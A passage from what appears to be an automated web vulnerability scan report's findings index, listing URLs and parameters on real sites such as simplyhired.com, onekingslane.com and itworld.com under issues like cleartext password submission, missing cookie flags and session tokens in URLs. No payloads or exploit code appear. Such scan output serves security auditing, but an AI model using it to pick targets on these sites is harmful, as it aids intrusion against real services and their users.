1.548. http://www.mtholyoke.edu/news/image_assets/0001/8364/ramdas_thumb_thumb.jpg [REST URL parameter 1]

1.549. http://www.mtholyoke.edu/news/image_assets/0001/8372/sohail_thumb.jpg [REST URL parameter 1]

1.550. http://www.mtholyoke.edu/news/image_assets/0001/8376/crosbie_thumb.jpg [REST URL parameter 1]

1.551. http://www.mtholyoke.edu/news/image_assets/0001/8384/nsf75_thumb.jpg [REST URL parameter 1]

1.552. http://www.mtholyoke.edu/news/image_assets/0001/8392/stomberg_thumb_thumb.jpg [REST URL parameter 1]

1.553. http://www.mtholyoke.edu/news/javascripts/prototype.js [REST URL parameter 1]

1.554. http://www.mtholyoke.edu/slideshow.xml [REST URL parameter 1]

1.555. https://www.onekingslane.com/join [confirmEmail parameter]

1.556. https://www.onekingslane.com/join [email parameter]

1.557. https://www.onekingslane.com/join [firstName parameter]

1.558. https://www.onekingslane.com/join [lastName parameter]

1.559. https://www.onekingslane.com/join [referringEmail parameter]

1.560. http://www.proxyon.com/ [name of an arbitrarily supplied request parameter]

1.561. http://www.proxyon.com/captcha/CaptchaSecurityImages.php [REST URL parameter 1]

1.562. http://www.proxyon.com/captcha/CaptchaSecurityImages.php [REST URL parameter 2]

1.563. http://www.proxyon.com/captcha/CaptchaSecurityImages.php [REST URL parameter 2]

1.564. http://www.proxyon.com/communication/links [REST URL parameter 1]

1.565. http://www.proxyon.com/communication/links [REST URL parameter 2]

1.566. http://www.proxyon.com/communication/links [name of an arbitrarily supplied request parameter]

1.567. http://www.proxyon.com/contact [REST URL parameter 1]

1.568. http://www.proxyon.com/contact [REST URL parameter 1]

1.569. http://www.proxyon.com/contact [name of an arbitrarily supplied request parameter]

1.570. http://www.proxyon.com/favicon.ico [REST URL parameter 1]

1.571. http://www.proxyon.com/favicon.ico [REST URL parameter 1]

1.572. http://www.proxyon.com/favicon.ico [name of an arbitrarily supplied request parameter]

1.573. http://www.proxyon.com/solutions/fico_solutions [REST URL parameter 1]

1.574. http://www.proxyon.com/solutions/fico_solutions [REST URL parameter 2]

1.575. http://www.proxyon.com/solutions/fico_solutions [REST URL parameter 2]

1.576. http://www.proxyon.com/solutions/fico_solutions [name of an arbitrarily supplied request parameter]

1.577. http://www.proxyon.com/solutions/reorganizing_system_structures [REST URL parameter 1]

1.578. http://www.proxyon.com/solutions/reorganizing_system_structures [REST URL parameter 2]

1.579. http://www.proxyon.com/solutions/reorganizing_system_structures [REST URL parameter 2]

1.580. http://www.proxyon.com/solutions/reorganizing_system_structures [name of an arbitrarily supplied request parameter]

1.581. http://www.simplyhired.com/a/accounts/login [f parameter]

1.582. http://www.simplyhired.com/a/job-widget/list/q-CIO%20OR%20%22Chief%20Information%20Officer%22/l-%20/ws-5 [partner parameter]

1.583. http://www.simplyhired.com/a/job-widget/list/q-CIO%20OR%20%22Chief%20Information%20Officer%22/l-%20/ws-5 [stylesheet parameter]

1.584. http://www.simplyhired.com/a/job-widget/list/q-onet%3A(15-1*)%20OR%20onet%3A(17-2*)%20OR%20onet%3A(11-3*)%20OR%20technology%20OR%20%C3%A2%C2%80%C2%9Cdata%20architect%C3%A2%C2%80%C2%9D%20OR%20%C3%A2%C2%80%C2%9Csoftware%20engineer%C3%A2%C2%80%C2%9D%20OR%20%C3%A2%C2%80%C2%9Ccomputer%20technician%C3%A2%C2%80%C2%9D%20OR%20%C3%A2%C2%80%C2%9Ccto%C3%A2%C2%80%C2%9D/l-%20/ws-5 [partner parameter]

1.585. http://www.simplyhired.com/a/job-widget/list/q-onet%3A(15-1*)%20OR%20onet%3A(17-2*)%20OR%20onet%3A(11-3*)%20OR%20technology%20OR%20%C3%A2%C2%80%C2%9Cdata%20architect%C3%A2%C2%80%C2%9D%20OR%20%C3%A2%C2%80%C2%9Csoftware%20engineer%C3%A2%C2%80%C2%9D%20OR%20%C3%A2%C2%80%C2%9Ccomputer%20technician%C3%A2%C2%80%C2%9D%20OR%20%C3%A2%C2%80%C2%9Ccto%C3%A2%C2%80%C2%9D/l-%20/ws-5 [stylesheet parameter]

1.586. http://www.simplyhired.com/a/job-widget/list/q-title%3AIT%20or%20%22Information%20Technology%22/l-%20/ws-5 [partner parameter]

1.587. http://www.simplyhired.com/a/jobs/list/q-xss [REST URL parameter 4]

1.588. https://www.twittergadget.com/gadget.asp [scrm parameter]

1.589. http://www.zdnet.fr/css/hp.css [REST URL parameter 1]

1.590. http://www.zdnet.fr/css/style-print.css [REST URL parameter 1]

1.591. http://www.zdnet.fr/css/style-screen.css [REST URL parameter 1]

1.592. http://www.zdnet.fr/css/thickbox.css [REST URL parameter 1]

1.593. http://www.zdnet.fr/js/carrousel.js [REST URL parameter 1]

1.594. http://www.zdnet.fr/js/common.js [REST URL parameter 1]

1.595. http://www.zdnet.fr/js/facebook.js [REST URL parameter 1]

1.596. http://www.zdnet.fr/js/jquery.cookie.js [REST URL parameter 1]

1.597. http://www.zdnet.fr/js/jquery.hoverIntent.minified.js [REST URL parameter 1]

1.598. http://www.zdnet.fr/js/jquery.open.js [REST URL parameter 1]

1.599. http://www.zdnet.fr/js/jquery.pngFix.pack.js [REST URL parameter 1]

1.600. http://www.zdnet.fr/js/scripts.js [REST URL parameter 1]

1.601. http://www.zdnet.fr/js/scrollingList.js [REST URL parameter 1]

1.602. http://www9.effectivemeasure.net/v4/em_js [ns parameter]

2. Cleartext submission of password

2.1. http://www.cnet.com/8799-4_1-0.html

2.2. http://www.cnet.com/8799-4_1-0.html

2.3. http://www.cnet.com/8799-4_1-0.html

2.4. http://www.cnet.com/8799-4_1-0.html

2.5. http://www.cnet.com/8799-4_1-0.html

2.6. http://www.filecluster.com/

2.7. http://www.filecluster.com/Games/

2.8. http://www.games.net/community/door_check.cfm

2.9. http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run

2.10. http://www.law.com/js/registration_globalNavBar.js

2.11. http://www.pcworld.com/pcworldconnect/comment_registration

2.12. http://www.simplyhired.com/a/accounts/login

3. SSL cookie without secure flag set

3.1. https://www.onekingslane.com/

3.2. https://www.createspace.com/en/community/community/member_showcase

3.3. https://www.onekingslane.com/api/customer-summary.xml

3.4. https://www.onekingslane.com/careers

3.5. https://www.onekingslane.com/contact-us

3.6. https://www.onekingslane.com/corporate/careers/

3.7. https://www.onekingslane.com/corporate/careers/tech/

3.8. https://www.onekingslane.com/join

3.9. https://www.onekingslane.com/join/api%252Fcustomer-summary.xml

3.10. https://www.twittergadget.com/oauth/redirect.php

4. Session token in URL

4.1. http://www.cio.com/

4.2. http://www.cio.com/article/689607/Tech_Titans_We_Will_Miss_and_Ones_Better_Off_Dismissed

4.3. http://www.cio.com/article/689930/15_Add_Ons_to_Become_a_Gmail_Power_User

4.4. http://www.computerworld.com/

4.5. https://www.createspace.com/Img/T341/T15/T25/ThumbnailImage.jpg

4.6. https://www.createspace.com/Workflow/cart.do

4.7. http://www.csoonline.com/

4.8. http://www.csoonline.com/article/689774/facebook-pwn-tool-steals-profile-info-helps-social-engineers

4.9. http://www.facebook.com/extern/login_status.php

4.10. http://www.infoworld.com/

4.11. http://www.itworld.com/

4.12. http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run

5. Password field submitted using GET method

5.1. http://www.cnet.com/8799-4_1-0.html

5.2. http://www.pcworld.com/pcworldconnect/comment_registration

6. Cookie scoped to parent domain

6.1. http://www.games.net/community/door_check.cfm

6.2. http://www.simplyhired.com/

6.3. http://www.simplyhired.com/a/accounts/login

6.4. http://www.simplyhired.com/a/jobs/list/q-xss

6.5. http://www.simplyhired.com/a/our-company/about-us

6.6. http://www.simplyhired.com/a/our-company/contact-us

6.7. http://www.cnet.com/

6.8. http://www.cnet.com/internet-security/

6.9. http://www.facebook.com/creditsuisse

6.10. http://www.google.com/ig/add

6.11. http://www.google.com/ig/adde

6.12. http://www.google.com/ig/cp/get

6.13. http://www.leadforce1.com/bf/bf.php

6.14. http://www.lijit.com/beacon

6.15. http://www.microsoft.com/click/services/Redirect2.ashx

6.16. http://www.simplyhired.com/a/catalog/keywords

6.17. http://www.simplyhired.com/a/facebook/metrics

6.18. http://www.simplyhired.com/a/facebook/status

6.19. http://www.youtube.com/get_video_info

6.20. http://www9.effectivemeasure.net/v4/em_js

7. Cookie without HttpOnly flag set

7.1. https://www.createspace.com/en/community/4.0.15/styles/csp/comm.css

7.2. https://www.createspace.com/en/community/4.0.15/styles/csp/csp-noavatar.css

7.3. https://www.createspace.com/en/community/4.0.15/styles/csp/csp.css

7.4. https://www.createspace.com/en/community/render-widget!execute.jspa

7.5. http://www.demosondemand.com/shared_components/javascript/launchDemoStage3PlayerClient_js.asp

7.6. http://www.games.net/community/door_check.cfm

7.7. http://www.pcworld.com/articleComment/get.do

7.8. http://www.pcworld.com/articleVote/get.do

7.9. http://www.simplyhired.com/

7.10. http://www.simplyhired.com/a/accounts/login

7.11. http://www.simplyhired.com/a/jobs/list/q-xss

7.12. http://www.simplyhired.com/a/our-company/about-us

7.13. http://www.simplyhired.com/a/our-company/contact-us

7.14. http://www.cnet.com/

7.15. http://www.cnet.com/internet-security/

7.16. https://www.createspace.com/en/community/community/member_showcase

7.17. https://www.credit-suisse.com/

7.18. https://www.credit-suisse.com/us/en

7.19. https://www.credit-suisse.com/us/en/

7.20. http://www.facebook.com/creditsuisse

7.21. http://www.google.com/ig/add

7.22. http://www.google.com/ig/adde

7.23. http://www.google.com/ig/cp/get

7.24. http://www.idgconnect.com/

7.25. http://www.itworld.com/

7.26. http://www.itworld.com/elqNow/elqBlank.htm

7.27. http://www.itworld.com/elqNow/elqCfg.js

7.28. http://www.itworld.com/elqNow/elqFCS.js

7.29. http://www.itworld.com/elqNow/elqImg.js

7.30. http://www.itworld.com/elqNow/elqOPG.js

7.31. http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run

7.32. http://www.itworld.com/kickapps/isfollowing-comments/204223

7.33. http://www.itworld.com/misc/collapse.js

7.34. http://www.itworld.com/misc/drupal.js

7.35. http://www.itworld.com/misc/textarea.js

7.36. http://www.itworld.com/sites/all/modules/contrib/InsertNode/back_from_comment.js

7.37. http://www.itworld.com/sites/all/modules/contrib/ajax_poll/ajax_poll.js

7.38. http://www.itworld.com/sites/all/modules/contrib/ajax_poll_results/ajax_poll_results.js

7.39. http://www.itworld.com/sites/all/modules/contrib/cluetip/cluetip/jquery.cluetip.js

7.40. http://www.itworld.com/sites/all/modules/contrib/cluetip/cluetip/jquery.hoverIntent.js

7.41. http://www.itworld.com/sites/all/modules/contrib/ctools/js/ajax-responder.js

7.42. http://www.itworld.com/sites/all/modules/contrib/ctools/js/modal.js

7.43. http://www.itworld.com/sites/all/modules/contrib/dialog/dialog.js

7.44. http://www.itworld.com/sites/all/modules/contrib/fbconnect/fbconnect.js

7.45. http://www.itworld.com/sites/all/modules/contrib/hoverintent/js/jquery.hoverIntent.minified.js

7.46. http://www.itworld.com/sites/all/modules/contrib/img_assist/img_assist.js

7.47. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js

7.48. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/themes/base/images/ui-bg_flat_75_ffffff_40x100.png

7.49. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.core.js

7.50. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.dialog.js

7.51. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.draggable.js

7.52. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.resizable.js

7.53. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.tabs.js

7.54. http://www.itworld.com/sites/all/modules/contrib/jquery_update/replace/jquery.form.js

7.55. http://www.itworld.com/sites/all/modules/contrib/jquery_update/replace/jquery.js

7.56. http://www.itworld.com/sites/all/modules/contrib/kickapps_comments/js/kickapps_comments.js

7.57. http://www.itworld.com/sites/all/modules/contrib/mollom/mollom.js

7.58. http://www.itworld.com/sites/all/modules/contrib/nice_menus/nice_menus.js

7.59. http://www.itworld.com/sites/all/modules/contrib/panels/js/panels.js

7.60. http://www.itworld.com/sites/all/modules/contrib/views_slideshow/contrib/views_slideshow_singleframe/views_slideshow.js

7.61. http://www.itworld.com/sites/all/modules/contrib/views_slideshow/contrib/views_slideshow_thumbnailhover/views_slideshow.js

7.62. http://www.itworld.com/sites/all/modules/contrib/views_slideshow/js/jquery.cycle.all.min.js

7.63. http://www.itworld.com/sites/all/modules/contrib/viewscarousel/jquery.jcarousel.pack.js

7.64. http://www.itworld.com/sites/all/modules/contrib/viewscarousel/viewscarousel.js

7.65. http://www.itworld.com/sites/all/modules/features/itw_activity/js/itw_activity.js

7.66. http://www.itworld.com/sites/all/modules/features/itw_answers/js/itw_answers.js

7.67. http://www.itworld.com/sites/all/modules/itw/modules/friendconnect/friendconnect.js

7.68. http://www.itworld.com/sites/all/modules/itw/modules/idg_ads/demandbase/demandbase-multiver-1.3/demandbase.js

7.69. http://www.itworld.com/sites/all/modules/itw/modules/idg_ads/doubleclick_ads/doubleclick_ads-multiver-2.5.4/doubleclick_ads.js

7.70. http://www.itworld.com/sites/all/modules/itw/modules/idg_ads/doubleclick_ads_itworld/jquery.lazyload-ad-1.4.min.js

7.71. http://www.itworld.com/sites/all/modules/itw/modules/itw_login/itw_login.js

7.72. http://www.itworld.com/sites/all/modules/itw/modules/itw_omniture/js/s_code-dev.js

7.73. http://www.itworld.com/sites/all/modules/itw/modules/itw_profiles/itw_profiles.css

7.74. http://www.itworld.com/sites/all/modules/itw/modules/itw_profiles/itw_profiles.js

7.75. http://www.itworld.com/sites/all/modules/itw/modules/itw_sharebar/js/sharebar.js

7.76. http://www.itworld.com/sites/all/modules/itw/modules/lyris/js/jquery.bgiframe.js

7.77. http://www.itworld.com/sites/all/modules/itw/modules/lyris/js/jquery.delegate.js

7.78. http://www.itworld.com/sites/all/modules/itw/modules/lyris/js/lyris.js

7.79. http://www.itworld.com/sites/all/themes/itworld/images/ab-actions.gif

7.80. http://www.itworld.com/sites/all/themes/itworld/images/ab-arrow.gif

7.81. http://www.itworld.com/sites/all/themes/itworld/images/ab-bg.gif

7.82. http://www.itworld.com/sites/all/themes/itworld/images/ad-choices-footer.gif

7.83. http://www.itworld.com/sites/all/themes/itworld/images/ajax-loader-sharebar.gif

7.84. http://www.itworld.com/sites/all/themes/itworld/images/answers-bg.png

7.85. http://www.itworld.com/sites/all/themes/itworld/images/answers-logo.gif

7.86. http://www.itworld.com/sites/all/themes/itworld/images/arrow-dn-red.gif

7.87. http://www.itworld.com/sites/all/themes/itworld/images/ask-a-q-tab.gif

7.88. http://www.itworld.com/sites/all/themes/itworld/images/bullet.gif

7.89. http://www.itworld.com/sites/all/themes/itworld/images/button-bg1.gif

7.90. http://www.itworld.com/sites/all/themes/itworld/images/carousel-next.gif

7.91. http://www.itworld.com/sites/all/themes/itworld/images/carousel-prev.gif

7.92. http://www.itworld.com/sites/all/themes/itworld/images/comment-arrow.gif

7.93. http://www.itworld.com/sites/all/themes/itworld/images/commentsSprite.png

7.94. http://www.itworld.com/sites/all/themes/itworld/images/commentsigninbg.png

7.95. http://www.itworld.com/sites/all/themes/itworld/images/default-profile-medium.png

7.96. http://www.itworld.com/sites/all/themes/itworld/images/email.gif

7.97. http://www.itworld.com/sites/all/themes/itworld/images/footer-logo.gif

7.98. http://www.itworld.com/sites/all/themes/itworld/images/formtextbg.gif

7.99. http://www.itworld.com/sites/all/themes/itworld/images/header-sprite.png

7.100. http://www.itworld.com/sites/all/themes/itworld/images/icons/comments.png

7.101. http://www.itworld.com/sites/all/themes/itworld/images/icons/itworld-favicon.png

7.102. http://www.itworld.com/sites/all/themes/itworld/images/icu-redbar.gif

7.103. http://www.itworld.com/sites/all/themes/itworld/images/in-share.gif

7.104. http://www.itworld.com/sites/all/themes/itworld/images/itworld_logo.png

7.105. http://www.itworld.com/sites/all/themes/itworld/images/joinandpostbg.gif

7.106. http://www.itworld.com/sites/all/themes/itworld/images/linkedin-icon-sml.png

7.107. http://www.itworld.com/sites/all/themes/itworld/images/mag-glass.gif

7.108. http://www.itworld.com/sites/all/themes/itworld/images/more-down-arrow.png

7.109. http://www.itworld.com/sites/all/themes/itworld/images/next-blog.png

7.110. http://www.itworld.com/sites/all/themes/itworld/images/prev-next-footerline.png

7.111. http://www.itworld.com/sites/all/themes/itworld/images/print.gif

7.112. http://www.itworld.com/sites/all/themes/itworld/images/questionbubble-dk.png

7.113. http://www.itworld.com/sites/all/themes/itworld/images/redarrow-rt.png

7.114. http://www.itworld.com/sites/all/themes/itworld/images/rssicon-sml.gif

7.115. http://www.itworld.com/sites/all/themes/itworld/images/seemore-redarrow.gif

7.116. http://www.itworld.com/sites/all/themes/itworld/images/share.gif

7.117. http://www.itworld.com/sites/all/themes/itworld/images/sl-divider.png

7.118. http://www.itworld.com/sites/all/themes/itworld/images/social-box-grad.gif

7.119. http://www.itworld.com/sites/all/themes/itworld/images/squarebullet-red.gif

7.120. http://www.itworld.com/sites/all/themes/itworld/images/twitter-icon-sml.png

7.121. http://www.itworld.com/sites/all/themes/itworld/js/ba-debug.js

7.122. http://www.itworld.com/sites/all/themes/itworld/js/carousel_display.js

7.123. http://www.itworld.com/sites/all/themes/itworld/js/ifoldie.js

7.124. http://www.itworld.com/sites/all/themes/itworld/js/inlineFieldLabel.js

7.125. http://www.itworld.com/sites/all/themes/itworld/js/itw_script.js

7.126. http://www.itworld.com/sites/all/themes/itworld/js/jquery.scrollTo-1.4.2.js

7.127. http://www.itworld.com/sites/all/themes/itworld/js/jquery.validate.js

7.128. http://www.itworld.com/sites/all/themes/itworld/js/mosttabs.js

7.129. http://www.itworld.com/sites/all/themes/itworld/js/node.js

7.130. http://www.itworld.com/sites/default/files/css/css_10cd9db87fdd7c34896a27df8d81e201.css

7.131. http://www.itworld.com/sites/default/files/css/css_470b1e44d460d0e76834779be626f7fe.css

7.132. http://www.itworld.com/sites/default/files/css/css_eecda8f4cb722a419ca2d21598c76b05.css

7.133. http://www.itworld.com/sites/default/files/fc_26055.png

7.134. http://www.itworld.com/sites/default/files/imagecache/blog_head_50x50/picture-12749.jpg

7.135. http://www.itworld.com/sites/default/files/imagecache/blog_head_50x50/picture-3232.jpg

7.136. http://www.itworld.com/sites/default/files/imagecache/blog_head_50x50/picture-5506.jpg

7.137. http://www.itworld.com/sites/default/files/imagecache/blog_head_50x50/picture-5772.jpg

7.138. http://www.itworld.com/sites/default/files/imagecache/blog_head_50x50/picture-6090.jpg

7.139. http://www.itworld.com/sites/default/files/imagecache/blog_head_50x50/picture-7409.jpg

7.140. http://www.itworld.com/sites/default/files/imagecache/blog_head_50x50/picture-8601.jpg

7.141. http://www.itworld.com/sites/default/files/imagecache/blog_head_50x50/picture-9469.jpg

7.142. http://www.itworld.com/sites/default/files/imagecache/large_thumb_150x113/IT_jobs_hp_0.gif

7.143. http://www.itworld.com/sites/default/files/imagecache/large_thumb_150x113/WinMac-01-150x113.jpg

7.144. http://www.itworld.com/sites/default/files/imagecache/large_thumb_150x113/dj-roomba.jpg

7.145. http://www.itworld.com/sites/default/files/imagecache/large_thumb_150x113/free%20games%20thumbnail.jpg

7.146. http://www.itworld.com/sites/default/files/imagecache/large_thumb_150x113/geeky%20plates%20thumbnail.jpg

7.147. http://www.itworld.com/sites/default/files/imagecache/large_thumb_150x113/girder%20cloud_thumb.jpg

7.148. http://www.itworld.com/sites/default/files/imagecache/large_thumb_150x113/html5-icon.jpg

7.149. http://www.itworld.com/sites/default/files/imagecache/large_thumb_150x113/learn-600x450.jpg

7.150. http://www.itworld.com/sites/default/files/imagecache/large_thumb_150x113/netflix2-600x450_1.jpg

7.151. http://www.itworld.com/sites/default/files/imagecache/large_thumb_150x113/thunderbolt-icon-150x113.jpg

7.152. http://www.itworld.com/sites/default/files/imagecache/large_thumb_150x113/windows_8.png

7.153. http://www.itworld.com/sites/default/files/imagecache/large_thumb_150x113/yahoo_collaps_290x218.jpg

7.154. http://www.itworld.com/sites/default/files/imagecache/large_thumb_150x113/zuck-style-150x113_0.jpg

7.155. http://www.itworld.com/sites/default/files/imagecache/thumb_120x90/att-billboard-600x450_0.jpg

7.156. http://www.itworld.com/sites/default/files/imagecache/thumb_120x90/cat-video-game-600x450_0.jpg

7.157. http://www.itworld.com/sites/default/files/imagecache/thumb_120x90/daumier-600x450_1.jpg

7.158. http://www.itworld.com/sites/default/files/imagecache/thumb_120x90/netflix2-600x450_1.jpg

7.159. http://www.itworld.com/sites/default/files/imagecache/thumb_120x90/obama2-600x450.jpg

7.160. http://www.itworld.com/sites/default/files/imagecache/thumb_120x90/pay-here-290x218.jpg

7.161. http://www.itworld.com/sites/default/files/imagecache/thumb_120x90/rim-600x450.jpg

7.162. http://www.itworld.com/sites/default/files/imagecache/thumb_120x90/steven-sinofsky3-600x450_0.jpg

7.163. http://www.itworld.com/sites/default/files/imagecache/thumb_120x90/thunderbolt-icon-150x113.jpg

7.164. http://www.itworld.com/sites/default/files/imagecache/top_story_1col_image/tmp/yahoo_collaps_290x218.jpg

7.165. http://www.itworld.com/sites/default/files/imagecache/top_story_2col_image/tmp/disguise.jpg

7.166. http://www.itworld.com/sites/default/files/images/quote_img_btm.jpg

7.167. http://www.itworld.com/sites/default/files/picture-12749.jpg

7.168. http://www.itworld.com/sites/default/files/picture-16291.jpg

7.169. http://www.itworld.com/sites/default/files/picture-16293.png

7.170. http://www.itworld.com/sites/default/files/picture-18755.jpg

7.171. http://www.itworld.com/sites/default/files/picture-20267.jpg

7.172. http://www.itworld.com/sites/default/files/picture-2341.jpg

7.173. http://www.itworld.com/sites/default/files/picture-3232.jpg

7.174. http://www.itworld.com/sites/default/files/picture-43.jpg

7.175. http://www.itworld.com/sites/default/files/picture-45.jpg

7.176. http://www.itworld.com/sites/default/files/picture-5506.jpg

7.177. http://www.itworld.com/sites/default/files/picture-5772.jpg

7.178. http://www.itworld.com/sites/default/files/picture-6090.jpg

7.179. http://www.itworld.com/sites/default/files/picture-7283.jpg

7.180. http://www.itworld.com/sites/default/files/picture-7409.jpg

7.181. http://www.itworld.com/sites/default/files/picture-8601.jpg

7.182. http://www.itworld.com/sites/default/files/picture-9469.jpg

7.183. http://www.leadforce1.com/bf/bf.php

7.184. http://www.lijit.com/beacon

7.185. http://www.microsoft.com/click/services/Redirect2.ashx

7.186. https://www.onekingslane.com/

7.187. https://www.onekingslane.com/api/customer-summary.xml

7.188. https://www.onekingslane.com/careers

7.189. https://www.onekingslane.com/contact-us

7.190. https://www.onekingslane.com/corporate/careers/

7.191. https://www.onekingslane.com/corporate/careers/tech/

7.192. https://www.onekingslane.com/join

7.193. https://www.onekingslane.com/join/api%252Fcustomer-summary.xml

7.194. http://www.simplyhired.com/a/catalog/keywords

7.195. http://www.simplyhired.com/a/facebook/metrics

7.196. http://www.simplyhired.com/a/facebook/status

7.197. http://www.twittergadget.com/oauth/redirect.php

7.198. https://www.twittergadget.com/oauth/redirect.php

7.199. http://www.visitor-track.com/admin/loghit.asp

7.200. http://www.youtube.com/get_video_info

7.201. http://www9.effectivemeasure.net/v4/em_js

8. Password field with autocomplete enabled

8.1. http://www.cnet.com/8799-4_1-0.html

8.2. http://www.cnet.com/8799-4_1-0.html

8.3. http://www.cnet.com/8799-4_1-0.html

8.4. http://www.cnet.com/8799-4_1-0.html

8.5. http://www.cnet.com/8799-4_1-0.html

8.6. http://www.facebook.com/creditsuisse

8.7. http://www.filecluster.com/

8.8. http://www.filecluster.com/Games/

8.9. http://www.games.net/community/door_check.cfm

8.10. http://www.law.com/js/registration_globalNavBar.js

8.11. https://www.merchantlink.com/logon/log_log_page.jsp

8.12. http://www.pcworld.com/pcworldconnect/comment_registration

8.13. http://www.simplyhired.com/a/accounts/login

8.14. https://www.twittergadget.com/tgauth.php

9. Source code disclosure

9.1. https://www.createspace.com/en/community/4.0.15/resources/scripts/gen/41a54d59c9f0130b7bdac8862ec506f8.js

9.2. http://www.goclio.com/resources/ClioQuestionAndAnswer.pdf

9.3. http://www.itworld.com/sites/all/modules/itw/modules/itw_profiles/itw_profiles.js

9.4. http://www.nationaldentalreviews.org/Handlers/ImageDisplay.ashx

10. Referer-dependent response

11. Cross-domain POST

11.1. http://www.horde.org/

11.2. http://www.ilovefreesoftware.com/

11.3. http://www.ilovefreesoftware.com/category/programming

11.4. http://www.ilovefreesoftware.com/category/theme/default/style.css

11.5. http://www.ilovefreesoftware.com/wp-content/plugins/wp-secure-by-sitesecuritymonitorcom/css/removenotice.css

11.6. http://www.ilovefreesoftware.com/wp-content/w3tc/min/abb96/default.include-footer.28a678.js

11.7. http://www.ilovefreesoftware.com/wp-content/w3tc/min/abb96/default.include.4a6bbc.js

11.8. http://www.pcworld.com/article/216731/simple_cheap_apps_for_keeping_secrets_online.html

11.9. http://www.techhail.com/

11.10. http://www.techhail.com/computers/gigabyte-motherboards-india/8481

11.11. http://www.techhail.com/headline/top-best-iphone-games/8468

11.12. http://www.techwev.com/

11.13. http://www.techwev.com/category/apple/

11.14. http://www.techwev.com/wp-content/themes/wp-clearv2.0/js/external.js

11.15. http://www.techwev.com/wp-content/themes/wp-clearv2.0/js/jquery.cycle.js

11.16. http://www.techwev.com/wp-content/themes/wp-clearv2.0/js/slideshow.js

11.17. http://www.techwev.com/wp-content/themes/wp-clearv2.0/js/suckerfish-cat.js

11.18. http://www.techwev.com/wp-content/themes/wp-clearv2.0/js/suckerfish.js

11.19. http://www.twittergadget.com/donate.html

11.20. http://www.twittergadget.com/donate.html

11.21. http://www.twittergadget.com/donate.html

11.22. http://www.twittergadget.com/donate.html

11.23. http://www.twittergadget.com/donate.html

11.24. http://www.twittergadget.com/donate.php

11.25. http://www.twittergadget.com/donate.php

11.26. http://www.twittergadget.com/donate.php

11.27. http://www.twittergadget.com/donate.php

11.28. http://www.twittergadget.com/donate.php

11.29. https://www.twittergadget.com/donate.html

11.30. https://www.twittergadget.com/donate.html

11.31. https://www.twittergadget.com/donate.html

11.32. https://www.twittergadget.com/donate.html

11.33. https://www.twittergadget.com/donate.html

11.34. https://www.twittergadget.com/donate.php

11.35. https://www.twittergadget.com/donate.php

11.36. https://www.twittergadget.com/donate.php

11.37. https://www.twittergadget.com/donate.php

11.38. https://www.twittergadget.com/donate.php

12. Cross-domain Referer leakage

12.1. http://www.cnet.com/

12.2. http://www.cnet.com/8799-4_1-0.html

12.3. http://www.cnet.com/internet-security/

12.4. http://www.coldspringframework.org/coldspring/examples/quickstart/index.cfm

12.5. http://www.connect.facebook.com/widgets/fan.php

12.6. https://www.createspace.com/Special/HeaderAnnouncement.jsp

12.7. https://www.createspace.com/Workflow/cart.do

12.8. https://www.credit-suisse.com/who_we_are/en/office_locator.jsp

12.9. http://www.csam-europe.com/chinst/mutual/en/default.asp

12.10. https://www.cyscape.com/images/common/episodes.gif%22

12.11. http://www.dinclinx.com/

12.12. http://www.facebook.com/connect/connect.php

12.13. http://www.facebook.com/plugins/likebox.php

12.14. http://www.facebook.com/plugins/likebox.php

12.15. http://www.facebook.com/plugins/likebox.php

12.16. http://www.facebook.com/plugins/likebox.php

12.17. http://www.facebook.com/plugins/likebox.php

12.18. http://www.facebook.com/plugins/likebox.php

12.19. http://www.facebook.com/plugins/likebox.php

12.20. http://www.facebook.com/plugins/likebox.php

12.21. http://www.facebook.com/plugins/recommendations.php

12.22. http://www.flickr.com/badge_code_v2.gne

12.23. http://www.flickr.com/badge_code_v2.gne

12.24. http://www.genuinewin7.com/about-win7.aspx

12.25. http://www.genuinewin7.com/genuine-sharing.aspx

12.26. http://www.genuinewin7.com/purchase.aspx

12.27. http://www.genuinewin7.com/safety.aspx

12.28. http://www.google.com/ig/adde

12.29. http://www.google.com/search

12.30. http://www.google.com/url

12.31. http://www.idg.com/idgnetrssfeeds.nsf/html

12.32. http://www.idg.com/www/homenew.nsf/home

12.33. http://www.ilovefreesoftware.com/wp-content/plugins/wp-secure-by-sitesecuritymonitorcom/css/removenotice.css

12.34. http://www.itworld.com/sites/all/themes/itworld/js/itw_script.js

12.35. http://www.law.com/jsp/lawtechnologynews/index.jsp

12.36. https://www.merchantlink.com/logon/log_log_page.jsp

12.37. http://www.pedigolaw.com/wp-content/themes/infocus/lib/scripts/prettyPhoto/js/jquery.prettyPhoto.js

12.38. http://www.reddit.com/static/button/button1.html

12.39. http://www.reddit.com/static/button/button2.html

12.40. http://www.simplyhired.com/a/accounts/login

12.41. http://www.simplyhired.com/a/job-widget/list/q-CIO%20OR%20%22Chief%20Information%20Officer%22/l-%20/ws-5

12.42. http://www.simplyhired.com/a/job-widget/list/q-onet%3A(15-1*)%20OR%20onet%3A(17-2*)%20OR%20onet%3A(11-3*)%20OR%20technology%20OR%20%C3%A2%C2%80%C2%9Cdata%20architect%C3%A2%C2%80%C2%9D%20OR%20%C3%A2%C2%80%C2%9Csoftware%20engineer%C3%A2%C2%80%C2%9D%20OR%20%C3%A2%C2%80%C2%9Ccomputer%20technician%C3%A2%C2%80%C2%9D%20OR%20%C3%A2%C2%80%C2%9Ccto%C3%A2%C2%80%C2%9D/l-%20/ws-5

12.43. http://www.simplyhired.com/a/job-widget/list/q-title%3AIT%20or%20%22Information%20Technology%22/l-%20/ws-5

12.44. http://www.spro.com/Default.asp

12.45. http://www.techwev.com/wp-content/themes/wp-clearv2.0/js/external.js

12.46. http://www.techwev.com/wp-content/themes/wp-clearv2.0/js/jquery.cycle.js

12.47. http://www.techwev.com/wp-content/themes/wp-clearv2.0/js/slideshow.js

12.48. http://www.techwev.com/wp-content/themes/wp-clearv2.0/js/suckerfish-cat.js

